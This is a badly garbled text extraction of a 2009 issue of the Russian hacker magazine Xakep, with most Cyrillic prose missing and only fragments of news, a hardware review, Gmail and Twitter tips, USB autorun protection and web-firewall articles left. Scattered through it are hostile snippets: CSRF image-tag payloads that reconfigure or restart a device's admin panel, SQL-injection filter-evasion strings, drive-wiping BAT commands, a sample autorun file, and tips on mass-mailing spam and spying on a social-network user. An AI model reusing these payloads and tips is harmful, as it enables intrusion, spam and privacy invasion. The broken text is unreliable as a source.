Вы находитесь на странице: 1из 149

: iPhone

. 56

x 03()2009

w w w.xakep.ru
03 (123) 2009

/ ARMY.MIL


ARMY.MIL . 48

123

WEP

. 64

. 30


WI-FI
WEP

USB-


LINUX
. 84

10
,
- . ,
.

,
party.xakep.ru.

,
Capture the flag, . , 2 .

nikitoz, . .
party.xakep.ru

, !

CONTENT03(123)
004 MEGANEWS

FERRUM
016 !

AMD
PC_ZONE
020 Google

gmail.com
026

030
USB-
034

038 Easy Hack



042

048 ARMY.MIL

052 CMS eZ Publish
CMS
056
Apple iPhone
064 WEP
,
weplab aircrack
068

072 -Tools

076 X-Profile:

080

Ubuntu 8.10

084

Linux

088

?
092 Python

096 - Symbian

Symbian? !
102

Pythone

106 Verilog

Verilog
112

116

SYN/ACK
120
PPTP- Windows Server 2008
126
MegaFAQ Windows Server 2008
130
Linux

134
Symon:

138 FAQ United


FAQ
141

143
8,5
144 WWW2
web-

052

064

102

130

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/Art

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru

>

(xa@real.xakep.ru)

/ .: (495) 935-7034, : (495)


780-8824
> GAMES & DIGITAL
(goryacheva@
gameland.ru)
>





>

>
( )
(strekneva@
gameland.ru)
>

>


> -
(alekseeva@
gameland.ru)

/Publishing

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14 2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.

.


.
.

Gameland
, ,
Gameland TV. , content@
gameland.ru.

>> meganews

MIFRILL

/ MIFRILL@REAL.XAKEP.RU /

Nintendo

Nintendo DSi, ,
.
. , DSi
, , , . Nintendo
GameBoy Advance , ,
. ( - ,
), SD-, 3.25. , DSi
-. Nintendo DSi
Camera, Nintendo DSi Sound Nintendo DSi Shop ,
,
WiFi ( DSi ). 169.99
, 149 ,
.

Skype

Microsoft,
,

5%

20% .

, Skype Windows
. Skype, ,
, , . , .
, , ,
- 400 /, 30 ! , , , , 50% , .
, .
,
, -. nokia! Skype Nokia
. ,
N-, Skype-. Nokia N97.


, , Creative Live! Cam Video
IM Ultra. 1.3-
,
5.0 (
) -.
,

, USB
Plug & Chat (

004


).

, muveeNow 2.0 Live!
Central Premium.
, Smart Face
Tracking
, .

2250 .
X 03 /123/ 09

>> meganews
,

-
. ,
- . , , ,
. ,
, .
() -
. ,
. :
, , . , .
, , , . ,

, ,
-.

6% .

2008
. 22%


Downadup (
Kido Conficker), .
,
, ,
Conficker B++.
,
. , Conficker
: .
Microsoft. $250.000
, Conficker. , Microsoft , ,
Server service (, ,
),
. ,
Windows Update .

5.5 16.5 .

Linux
.

. .

. ,
Eco-Box, , , , , ,
.
Origo Industries,
Origo
. , , CO2

-,
.
, , ,
.
,
. ,
. , ,
,
.

006

X 03 /123/ 09

>> meganews

. Google.
-, , Google
Google Maps, .
, :
. , Google
. -, Google
,
. Google
Health . , , ,
, \. ,
, , , Google.
, , Google Maps Latitude (

Android Windows Mobile 5.0,


BlackBerry, iPhone, iPod Nokia Symbian).
Latitude ,
, .
, Google Maps, ,
. ,
, ,
, .

, ,

35.5% .

3 ,


,
, .
,
, .

( ), .
,
MS Word . ,
, , , ,
. ,
,
. , .


Sun
Tech Days, Sun Microsystems,
, .
4- -,
8 10 . , Sun
Tech Days 1500 , , .

, .
40 , ,
Sun Microsystems
OpenSolaris 2008.11, JavaFX, NetBeans 6.5, xVM Server, MySQL.

008

-,
JavaFX OpenSolaris. University Day (10
) ,
, , .
,
Sun Microsystems
.
, : , - Client Software Group,
, - Solaris Data,
Availability, Scalability HPC Sun Microsystems Inc.
, , ,
: http://developers.sun.ru/techdays2009.
X 03 /123/ 09

>> meganews

5
2.5

, , , ? , , , , HP
TouchSmart tx2z. , ,
, HP
. , TouchSmart tx2z .
12.1 1280800 ,
180, AMD Turion X2 2.1 , DDR2
RAM ( 8 , 3 ), ATI Radeon
HD 3200 250 . ,
DVD-. ,
, , ,
. , TouchSmart tx2z .
, $1.800-2.000,
HP $1000. , ,
, , , .



Microsoft, , .
Bill & Melinda Gates
Foundation. , ,
. , , TED,
,

? ,

. - Microsoft
, , , ,
. ,
.
, .

Mobile World Congress, ,


Sony Ericsson. Idou (
, ) ,
, .
12.1 , ,
! Sony Cyber-Shot, ,
.
3.5 360x640 , , GPS, FM-, mircoSD- Wi-Fi,
Bluetooth, USB.
Symbian Foundation, .
.

010

X 03 /123/ 09

>> meganews


, :

.
.
,
,
, .
, .
, , . ,
, ,
.
, 20 ,

.

( ,
). , .
10 . 5 . ,
.

83% .

Ion
,
Ion NVidia ,
.
, , Ion
, -
Intel Atom.
,
GeForce 9400.
Atom -
,
1080p,
Windows Vista Windows 7.
NVidia , $299.
,
Intel NVidia .

, CPU GPU.
, ,
, .

012

X 03 /123/ 09

>> meganews

!
Psion ,
. Psion , ,
(netbook), .
,
. ,
netBook netBook Pro. ,
Canadian Psion Teklogix ( Psion, ) . ,
Gizmodo. Psion
, .
Dell . Dell (USPTO)
Psion netbook.
, Psion
.
....

=
Facebook
. , ,
. , ,
, , . Facebook
150 . , , , .
, Facebook .
,
, , Facebook 10
120.000 .
, , ,
. Facebook

.



,
Apple, IT-.
, Apple 1987
,
. ,
,
Fusion-io. SSD-,
$10.000 $100.000. Fusion-io
,
, ,
. , !

014

X 03 /123/ 09

>> meganews


, .
-
The Pirate Bay (TPB). ,
,
,
$140.000. , ,
Warner Bros.,
MGM Pictures, Columbia Pictures, 20th Century Fox Sony BMG.
14
. vs Twitter .
, ,
, ,

,
. , ,
. - (
) : ,
. , . . , , , ,
,
. , ,
3-5 . TPB .
, -,
, .

90% -, ,


IBM,
. , ,
, . IBM, ,
, ,
. 10 IBM,
, , . .

, .
, , ,
... ,
. , , ,
( , . .) , .
, , .
, , , .
, , , .
X 03 /123/ 09

015

>> ferrum

!
AMD

,

Advanced Micro Devices.
AMD Phenom II
. , , , AM-2+ .
! AMD,
NVIDIA ( ,
/ ).

,
.
:
1. . ,
- ( , SATA ).
2. . , .
3. : , 3DMark06,
, -

016

WinRar (, ).
4. . FarCry.
5. ( , ) Everest
Ultimate 4.50 ( stress-test). ,
. - ,
(,
) .
, .
Futuremark
,
.
/. !
X 03 /123/ 09

>> ferrum
FAR CRY (FPS)


: AMD Phenom X4 9650
, : 2 (Corsair XMS2-8000 2x512 , OCZ PC2 8000 2x512
)
: RAID 0 Samsung 80 SATA II
: Sapphire ATI Radeon HD 4870
DVD-: LG GSA-H62N
: GMC R2 TOAST
: ThermalTake W0131RE 850W
: Microsoft Windows XP

MSI DKA790GX
Gigabyte MA790GP-DS4H
Foxconn A7DA-s
Biostar TA790GX A2+
Asrock A780FullHD
ASUS Crosshair II Formula
0

10

20

30

40

50

60

70

80

90

000

FPS

ASUS Crosshair II Formula


:

ST BUY
ST BUY

BEST BUY

BE

BE

: NVIDIA nForce 780a SLI


: AMD Phenom/Phenom X4/Phenom
X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 8 , 4xDIMM DDR2, 667 1066
: 3xPCI-Express 16, 1xPCI-Express 1, 2xPCI 32-
: NVIDIA SLI 3-way
: 6xSATA II, 1xIDE, 1xFDD
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, 1xE-SATA,
2xGbE LAN, HDMI, , , D-SUB,
7.1- ( PCI-Express)

Asrock A780FullHD
:
: AMD 780G
: AMD Phenom/Phenom X4/Phenom
X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 16 , 4xDIMM DDR2 DIMM, 533 1066
: 1xPCI-Express 16, 1xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 6xUSB 2.0, GbE LAN, DVI, D-SUB,
5.1-

8300 .
ASUS,

.
( WinRar
1156 /).
ASUS CPU Level Up. . BIOS , .
( ),
.
: , . ,
PCI-Express 1.

, , .
X 03 /123/ 09

1800 .
1800 ,
!
. - mATX, .
, , : 4
1066 PCI-Express
x16 . SATA II.
AMD
AM2/AM2+ .

Realtek ALC662 ,

- - Creative X-Fi.
, (
2000 . ). ,
Radeon HD 4870 X2.

017

>> ferrum
WINRAR (/)

C ()

MSI DKA790GX

MSI DKA790GX

Gigabyte MA790GP-DS4H

Gigabyte MA790GP-DS4H

Foxconn A7DA-s

Foxconn A7DA-s

Biostar TA790GX A2+

Biostar TA790GX A2+

Asrock A780FullHD

Asrock A780FullHD
ASUS Crosshair II Formula

ASUS Crosshair II Formula


0

200

400

600

800

1000

1200

1400

000

32

34

36

38

40

42

44

000

Gigabyte

Biostar TA790GX A2+

Foxconn A7DA-S

: AMD Phenom/Phenom X4/Phenom


X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 16 , 4xDIMM DDR2 DIMM, 533 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394, 1xE-SATA,
GbE LAN, HDMI, DVI, D-SUB, 7.1- .

: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 8 , 4xDIMM DDR2 DIMM, 533 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1-

2900 .

4400 .

, . ,
Smart Fan. ,
.
, ,
,

.

Foxconn A7DA-S 790GX. -,


.
-, BIOS
. -,
( ).

FireWire ( ). eSATA-.
, ,
eSATA- . ,
PCI-Express x16,
-. ,
- .

USB 2.0 (
6). eSATA ,
. , ,
, , .
,
.

018

X 03 /123/ 09

>> ferrum
3DMARK 2006 (MARKS)
MSI DKA790GX
Gigabyte MA790GP-DS4H
Foxconn A7DA-s
Biostar TA790GX A2+
Asrock A780FullHD
ASUS Crosshair II Formula
0 500 1000 1500 2000 2500 3000 3500 4000
000

, .

TORs

EDI

:
: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 16 , 4xDIMM DDR2 DIMM, 667 1066 ,
: 2xPCI-Express 16, 3xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1- ,

EDI

TO
s CHOICE

Gigabyte MA790GP-DS4H

ICE

HO

MSI DKA790GX
:

5500 .

: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 8 , 4xDIMM DDR2 DIMM, 667 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 5xSATA II, 1xIDE, 1xFDD
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, GbE LAN,
HDMI, DVI, D-SUB, 7.1- , , 1xE-SATA

4900 .
, , . PCI Express 1 , .
, , ,
.
. ,
AMD.

. ? , -,
, .
- , ,
- .
,
. , , BIOS
,
. , ,
eSATA, .
, .

SATA II. ,
AMD 790GX, eSATA-
( , , eSATA
!).

.
, .

MSI DKA790GX,
. , -

AMD 790GX.
Asrock A780FullHD ,
. z

X 03 /123/ 09

019

>> pc_zone


/ STEP@GAMELAND. RU/

GOOGLE
GMAIL.COM

, . , , ,
. , - . !

. ,
- -
, Exchange . ! , ,
. Gmail,
, , .
,
, - .

GMAIL?
. -, .
, . .

, Gmail offline, ,
, .
- .
, 7 :).
, , . , -
: .

020

- , -
Gmail
,
( ).
300-400 -.
Gmail !

. (
labels) ,
. , , Outlook The Bat! . :
Gmail.
( ) 99% .
, Gmail .
, 3 ,
. Google
!

0:
Gmail : ,

, .
, , ,
X 03 /123/ 09

>> pc_zone

Gmail , addon
. ? Gmail , ,
? .
Gmail
. ,
English !

1:
, . ,
Gmail? ?
, . : step@real.xakep.ru stepan.ilyin@
gmail.com. Gmail ! :) ,
,
. , ,
, . ,
,
POP3.
, Outlook Bat. Settings
Accounts. Get mail
from other accounts , , ,
Add another mail account.
, : email,
/ POP3-. SSL-, ,
. , Gmail -
Inbox. :
(, IMAP
Exchange ), Gmail . ,
, 300
, .
.
. , Gmail.

,
. : Gmail
. ,
Accounts Add another email address you own
email.
( , , ) . , - .

X 03 /123/ 09

2: GMAIL GOOGLE
Google ,
. , ,
, :
from:<>
( )
subject:<>
label:<>
filename:< >

in:inbox/in:trash/in:spam
is:starred :)
is:unread/is:read
is:chat

, from:nikitoz label: is:unread


ftp ftp. ?
, ( -

Show search options).

3: GMAIL LABS
Google , .
, , ,
- Beta (,
,
),
. ,
Gmail Labs ( ). :
Offline Gmail ( 4);
Tasks (todolist) ;
Quick Links , ,
;
Signature tweaks ;
Navbar drag and drop
, ;
Custom Label Colors
(labels);
Multiple Inboxes Gmail;

021

>> pc_zone


Flacky Mode : , ,

,
. , ,
Spam Trash , Gmail
. .
, .
-, . ,
.

. , ,
Gmail labs.
Flacky
Connection,
. Gmail
, . ,

.

info



Google Gtalk,

XMPP
(Jabber).
Gmail

Jabber-
.
,

AOL,

,

.
,
:).

5: GMAIL

, , Gmail

Create a Document ;
Google Docs gadget
Google Docs.

4: GMAIL
,
,

. Gmail

.
Vombato Mail Drive
(www.vombato.com)


,

POP3.

022

! -,
-
, ! Gmail
, . ,
Google Gears, - ,
,
Gmail. Google,
.
, -, :). , , gmail.com , , ,
. ,
Gmail Labs,
, Offline
. :
, .
, Gmail
,
.

, Gmail
? ,
. Google Chrome (www.
google.com/chrome), Gmail . offline-
.
Mozilla Prism
(labs.mozilla.com/projects/prism),
, MacOS, Linux. ,
Mailplane (mailplaneapp.com),
Gmail.

6: GMAIL
,
.
- . , ,
Gmail ,
. ---! Send by
Gmail dragndrop . ,
gAttach, Affixa (www.affixa.com). ,
(Microsoft Office, Adobe
Acrobat ..)
.
mailto,
, ,
Gmail
X 03 /123/ 09

>> pc_zone

Gmail

Gmail Labs
Yahoo! Mail. , ( Build 1229) .
mailto ,
Opera Mail (M2), -

Gmail!
- , SSL- . ,
,
HTTP-
. , , .
:
https://www.google.com/accounts/ServiceLogin?...

HTTP, :
http://mail.google.com/mail

https, .
, -
, - (, VPN).
The Middler, Defcon16. ,
-,
Gmail. Google

(Always use https),
. .
The Middler . ,
, Ruby ( )
.
,
ARP- DNS/DHCP-. The
Middler :
user- , HTTP;
HTTPS HTTP;
-.
X 03 /123/ 09

. Preferences Advanced
Programs.

7:
, Gmail:
, ,
(
Gmail Drive). ,
. Google
: .
,
CookiePie (www.nektra.
com/oss/firefox/extensions/cookiepie) Firefox,

, , Gmail.
Firefox, Gmail Manager (https://addons.mozilla.org/en-US/firefox/
addon/1320), .

Gmail

-
.
, ,

(server-side e-mail filter). :
1. Gmail;
2. Gmail . ,
, Gmail ,
,
header.
3. ,
, Gmail. Inbox
(, Gmail ).
Gmail. :
Gmail ? :
X-Forwarded-For: user@gmail.com forwarded@to.com
X-Gmail-Received: some-random-number
Delivered-To: user@gmail.com

023

>> pc_zone

, .
,

,
, , .

8: GMAIL
- , Gmail 7
. , , ?
, ,
. ! :)
GMail Drive (www.viksoe.dk) .
,
. ,
.
? , ,
Gmail Drive Config (http://convivea.com).
, Python GmailFS (richard.jones.name),
Mac OS gDisk (gdisk.sourceforge.net).
,
Gmail.
Php Gmail Drive (pgd.sourceforge.net), PHP
Gmail libgmailer
(sourceforge.net/projects/gmail-lite).

9:
Gmail Labs
. , Greasmonkey
Firefox. :
, ! , Gmail ,
- .
, Better Gmail 2 Firefox (addons.mozilla.
org/en-US/firefox/addon/6076). ,
Greasmonkey, , !
:
;
;
, ;
;
;
..

10: GMAIL
Gmail ! FAQ. ,

024

, Gmail
. ,
Gmail Lite (gmail-lite.sourceforge.net). Gmail (
AJAX-). Google
HTML-
. Gmail Lite, , ,
- .
- PHP.
, .
www.tedsta.com/gmail/index.php,
:).
libgmailer.
11:
, Google,
100% , .
, ,
- .
, , . , Gmail
Gmail Backup (www.gmail-backup.com).
email, , , ,
IMAP EML
. Restore,
. ,
, . , , wxPython (http://wxpython.org). z
X 03 /123/ 09

>> pc_zone


/ ALEKS.RAIDEN@GMAIL.COM /

.
, , CNN
BBC . nipp
140 .
.

? , :
, .
: , , ,
. : + = .

140
-
, . , ,
( follow, ).
http://
twitter.com/_.
, ,
, follow-.
, , .
140 .
? ,
, SMS
, . ,
,
. ,
Linux ,
0-day . 140 :
SMS 160
. ( , API),
,

026

. , , , iPhone, Nokia
, Java-.
SMS-, ,
.

?
:
. ?. ,
. : , ? ,
, . : !
, ,
, . ... .
.
: , 16-00, !? .
friend- ,
. . ,
, , , .
. ,
-
X 03 /123/ 09

>> pc_zone

info


API,
,
. ,
WHOIS username
(
), GET
username ( ), FAV username
( ), INVITE phone
number (
,
).


(http://
twitter.zendesk.
com/forums/10711/
entries/14020).

, /
.
.
, , .
,
,
. Wordpress ,
. ,
140 ! ,
, !
? ,
- .
, (,
). ?
- !

TWITTER-

API.

: ,
,
.
X 03 /123/ 09

(apiwiki.twitter.com). , , ,
, :).


?

. ,
,
, .
.
, ! , ( ), ,
, , ,
. - .
, :
, .
http://www.rutwitter.com/r/?page=1 - . ,
Umputun (- ): 2486 .

027

>> pc_zone

dvd
DVD-

,


(
-?).

warning


,


,

,
.
, -

,
,
.

links
http://twitter.
pbwiki.com/Apps

- ,
.

028

Digsby Twitter-

API -. hello world!,


-.
.
,
. -

,
(
?).
AIR- twhirl, (twitter.
com/abrdev) .
. , , -

Twitter-
,
, .
,
.

,

.
- -

. @
.
,
-.
,
,
. -
,
!
X 03 /123/ 09

>> pc_zone

, ,
!

,
follow-

!
. , . ,
. , .
, -
: Twitter ?!.
:). z

(twitter.com/downloads) . PC, , iPhone/iTouch, Google


Desktop-, Mac-, Linux- ,
, . , ,
, .
( The Top 21 Twitter Applications,
www.techcrunch.com/2009/02/19/the-top-20-twitter-applications). 20
- .

. ,
, API. ! , ,
,
. , (http://
twittercounter.com),
- (http://twitter.com/widgets), (http://www.
tweetfind.com), (http://
twittercounter.com/pages/country?time_zone=Kyev)
, , ( , ).
X 03 /123/ 09

( :
http://twitter.com/jack) 2006 ,
.

, , .
-,
MTV Music Award, Apple WWDC 2007. , , , ,
.
, ,
, .
,
.
6 . , ,
50 . Facebook,
500 , .
, ,
.
,
, 0 .
Ruby on Rails MySQL. ,
memcached.
( - 600
!) 8 Sun.
8- 180 HTTP-
Monreal RoR. . ,
. ,
RoR ,
Twitter. , Java
++, , , .

029

>> pc_zone

STEP
/ STEP@GLC.RU /


USB-

: . ,
, ,
. : USB-. . .

- -
.
: ,
. ,

?
, . , ,
2 autorun.inf .
,
autorun.inf , ,
. ,
,
. Downadup,
, , ,
. , -,
, -, .

NTFS , 1
.
, , . ,
. , ,
(, , ). ,
FAT32, ,
NTFS, .

030

NTFS HP: HP USB Disk Storage Format Tool (


Google SP27213.exe).
NTFS.
, , , .

:
format f: /FS:NTFS

,
:
convert f: /FS:NTFS

, autorun.inf
, USB-. - .
?
( FILES), - // .
.
, .
, , ,
.
X 03 /123/ 09

>> pc_zone

HDD HP USB Disk


Storage Format Tool

info
, ,
.
, : ,
, . , ,
Autorun (
).
autorun.inf, FILES.
? , . ,
ACL-, . , ,
, , .
,
,
, .
NTFS
FAT32.
PSP MP3- NTFS. :
NTFS Read only Linux.
! NTFS
. FAT32,
, NTFS
, , ,
, , . ,
!

FAT32, 2
, c NTFS
.
FAT32 , ,
.
autorun.inf. -
AUTORUN.
INF, Read only Hidden.
.
, , . ,
. . AUTORUN.
INF. , ,
. ,
,
X 03 /123/ 09


NTFS,

.
:

.
,


NTFS,

.

,

:



.

FAT32 !
USB Disk Security (www.
zbshareware.com), AUTORUN.
INF zhengbo. (-, ,
, ). : . -
$50, .

FAT32/NTFS (http://www.xakep.
ru/magazine/xA/062/080/5.asp),



UNC-. ,
UNC
,
.
\\server\share\path,
server .

,
server ? .,

031

>> pc_zone

dvd

FAT32/
NTFS
.

warning



, , , .

-
,

.


. :
!

. , : \\?\C:\
folder\file.txt. ,
UNC-
. BAT-
:
mkdir "\\?\J:\AUTORUN.INF\LPT3"


LPT3, AUTORUN.INF
, ,
autorun.inf, !
. -,
UNC- /
: \\?\J:\AUTORUN.INF\LPT3.

: , AUTORUN.INF1. ,
, , . BAT-,
, , , :
, (
),
( , Downadup),
;
AUTORUN.INF COM1 ;
NTFS;
desktop.ini,
.
rd /s /q %~d0\recycled
rd /s /q %~d0\recycler
rd /s /q %~d0\System Volume Information"
del /f /q %~d0\autorun.*
mkdir "\\?\%~d0\autorun.inf\com1"
attrib +s +h %~d0\autorun.inf
del /f /q %~d0\desktop.ini
mkdir "\\?\%~d0\desktop.ini\com1"
attrib +s +h %~d0\desktop.ini

, ,
autorun.bat .


,
. ,
, , -,
, , -,
:
Autorun.inf

BAT-
.
. : ,
? !



. - .
,
, ?
, ACL-
. ,
cacls (Change Access Control
Lists)
Windows XP Home Edition.
ACL-
. ,
X: :
cacls X:\
:
X:\ :(OI)(CI)F
F ( Full)
,
(OI)(CI).
, .
:
cacls X:\ /E /R

(Read only):
cacls X:\ /G :R
.
:).

032

X 03 /123/ 09

>> pc_zone
.INI, ,
SYS HKEY_
LOCAL_MACHINE\Software.
4. ,
, *.*. HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
AutoplayHandlers\CancelAutopla y\Files
REG_SZ *.*.
5. MountPoints2, , USB-.
, ,
. .
MountPoints2,
, .
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\MountPoints2
, . ,
MountPoints2 .
,
. , ? :)


Windows, ,
. !
Windows ,
. , autorun.
inf :
[autorun]
open = calc.exe
shell\Open\Command=calc.exe
shell\Open\Default=1
shell\Explore\Command=calc.exe
shell\Autoplay\Command=calc.exe

, , ,
. ? ! , ,
, . , :
1. , CD. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Cdrom, AutoRun .
2. HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows\Curr entVersion\policies\Explorer.
NoDriveTypeAutoRun dword
ff .
HKEY_CURRENT_USER,
.
3. HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
IniFileMapping\Autorun.inf, (
REG_SZ) @SYS:DoesNotExist. Windows ,
autorun.inf , , Windows 95!
, .INI-
. , ,
autorun.inf, HKEY_LOCAL_MACHINE\
SOFTWARE\DoesNotExist (, ).
, autorun.inf , .
@
X 03 /123/ 09



. , , ,
. ,
.
1. AutoRunGuard (autorun.synthasite.com/AutoRunGuard.php).
,
, CD. ,
, .
AutoRunGuard autorun.inf,
, .
2. Flash Guard (www.davisr.com).
. , :
Autorun.inf
;
Autorun.inf;
Autorun.inf;
Autorun.*;
Autorun.inf .
3. USB Disk Security (www.zbshareware.com). ,
. , -.
Flash Disinfector. z


. ,
. Secure Digital (SD) - .
: ,
read only.
, (
,
).

033

>> pc_zone


/ KOMAROV@ITDEFENCE.RU /

, ,
. , , , . .

.
,
(IDS)
(IPS).
. , ,
, . , IDS Snort :
,
(, -).
. ,
SQL- 15 3 , 8 .
! ,
:
(Access Complexity);
(Exploitability);
;
(Report Confidence).
VSS (www.first.org/
cvss), . ? , -

034

,
. ( ) , .

, .

WEB-
X-Force (xforce.iss.net),
IBM, , .
WEB- -
50% . ,
, , Google?
, .
,
,
. ( ) , , - .

, Web Application Security LifeCycle Microsoft
SDL. , ,
, .
,
.
X 03 /123/ 09

>> pc_zone

info

XSS-! , IDS .
demo.php-ids.org. , :)

, , ,
WEB Application Firewall (WAF),
Deep Packet Inspection Firewalls (
). , , ,
,
WEB-.
OSI (
), HTTP. , HTTP/HTTPS/SOAP/XML-RPC
. ,
.
GreenSQL (www.greensql.net).
SQL ,
SQL-. WAF ,
-
. mod_security,
http- WEB-,
GreenSQL -, .
, Reverse-proxy, SQL-, ,
MySQL. , ,
.

: , ,
(1=1) ,
TRUE,
.. GreenSQL
X 03 /123/ 09

,
DELETE, UPDATE INSERT, , DROP
CREATE. , drag
and click, , !
, , WEB- . , GreenSQL
Linux/Unix-,
:


WAF

NSS Labs (nsslabs.
com/certification/
waf/nss-wafv10-testproc.pdf).


(SmartBits SMB
6000, Reflector 2500,
Avalanche 2500)

, ,

WEB-
.
,


.

#
wget http://www.greensql.net/public/releases/
Debian_Etch/i386/greensql-fw_0.9.2_i386.deb
dpkg -i greensql-fw_0.9.2_i386.deb
#
What is the name of the server used to store
GreenSQL configuration db (MySQL server)? <-localhost
What is the database name for the GreenSQL
configuration? <-- greendb
Would you like to set up the database and
tables automatically? <-- Yes
What is the username of the MySQL
administrator? <-- root
Enter the MySQL administrator password <-your_root_sql_password ( mysql
root-a)
Confirm this password <-- your_root_sql_
password ( mysql root-a)
What is the GreenSQL db username? <-- green
What is the GreenSQL user password? <--

035

>> pc_zone

GrSecurity .

extension. IIS Manager



greensqlpassword ( green )

links
WAF

owasp.org/index.
php/Web_Application_
Firewall.

,
, .


GreenSQL db username .
, . greensql-fw
3305 , MySQL
3306.
, 127.0.0.1 3305. :
$db_connect = mysql_connect('127.0.0.1:3305',
'mysql_user', 'mysql_password')


. front-enda greensql-console
:
curl "http://greensql.net/download/greensqlconsole-0.4.6.tar.gz" > greensql-console0.4.6.tar.gz
tar -zxvf greensql-console-0.4.6.tar.gz & cd
greensql-console
emacs config.php # ,

greensql-console -
templates_c :
chmod 777 templates_c.
:
.
PHP-IDS (php-ids.org).

Google Group. PHP-IDS
, XSS, RFI, LFI.

, svn.
php-ids.org/svn/trunk/lib/IDS/default_filter.xml.
, ,
. Snort/mod_
security. ,
GreenSQL.

036


WEB ,
. , Windows
. ,
Linux,
. Microsoft, .
Dynamic IP Restrictions Extension (Microsoft.com) .
2008 Microsoft ,
IT-, web-.

SQL (SQL Injection). , The Dynamic
IP Restrictions Extension .
SQL-, XSS-,
DDoS-.
(SYN-,
DNS- ),
IP-. IP-
HTTP- ,
. , ,

.
IIS7 IPv4 and Domain Restrictions,
Dynamic IP Restrictions Extension IPv6.
iis.net/
downloads/default.aspx?tabid=34&g=6&i=1825.
IIS Manager
.
Edit Dynamic Restrictions .
The Dynamic IP Restrictions Extension
,
HTTP- 403 404, . . ,
IP. ,
IP,
.

(Capture The Flag)
RST/GHC,
. X 03 /123/ 09

>> pc_zone



CSRF-:
<img src=https://host/ajax.html?hostname=hostname
&gateway=10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max
_src_conn=100&max_src_conn_rate_num=100&max_src_
conn_rate_sec=10&blacklist_exp=3600&ftp_
server=c__FTP-&ftp_port=21&ftp_
login=user&ftp_passwd=password&ftp_remote_dir=/
&remote_support_on=on&action=configuration&do=save>

,
,
:
<img src=https://host/ajax.html?action=restart&do=
core>

IPS SQL-injection
. z
,
( , ,
).
,
. , -
.
.
Fspy (mytty.org/fspy). .
./fspy . , /.fspy R 1 D s,A O [,T,], , d,:,p,f, size: ,s, atime: ,A
/etc/ ,
/etc/.

:
, . ,
Profense Web Application Firewall (armorlogic.com/profense_overview.
html) CSRF - HTTP-. ,
: Defenses against all OWASP Top Ten
vulnerabilities ,
OWASP (www.owasp.org). ,
. , ,
FTP/SCP, syslog-. X 03 /123/ 09

WAF
, WAF,
. , WAF ,
, . ,
WAF
evasion-, .
, UNION SELECT, OR 1=1,
EXEC_XP , , . , OR
1=1, :
OR LALA=LALA ( );
OR LALA=NLALA ( N,
nvarchar SQL-.
,
);
OR LALA=LA+LA ( );
OR LALA in (LALA) ( ).

037

>>

Easy Hack}

R0ID SKVOZ
/ R0ID@MAIL.RU /

/ KOMAROV@ITDEFENCE.RU /

:

:

-, PHP-
mail() DirectMailer. - ,
Inbox. ,
, .
[INBOX]Golder, DirectMailer.
, :

( 200000 )

email-


:

:
,
www.vkontakte.ru. ,
, ,
:). ,
. ,
.
ID .
,
http://night.doomgate.ru/vkontakte.
.
.
1. vkontakte.ru ,
.
2. ID .
. _
id.

038




Outlook The Bat
Text/HTML


( [INBOX]Golder
, ,
, ):
1. .
2. , ( , , ).
3. /cgi-bin.
4. inbox.cgi 755, (log, upload, sys) 777.
5. config.txt. ( DVD).
6. config.txt .

3. http://night.doomgate.ru/vkontakte.
4. id
ID .
5. :

,








,

,
,
()

6.
www.vkontakte.ru ID .
, Vrazvedke. , .
X 03 /123/ 09

>>
. ,
, .
Online,
profile.php .
,
/, :).
. :
Vkontakte . , Firefox :
1. Firefox.
2. about:config,
.
3. filter network.http.redirection-limit.
4. , 0 (
).
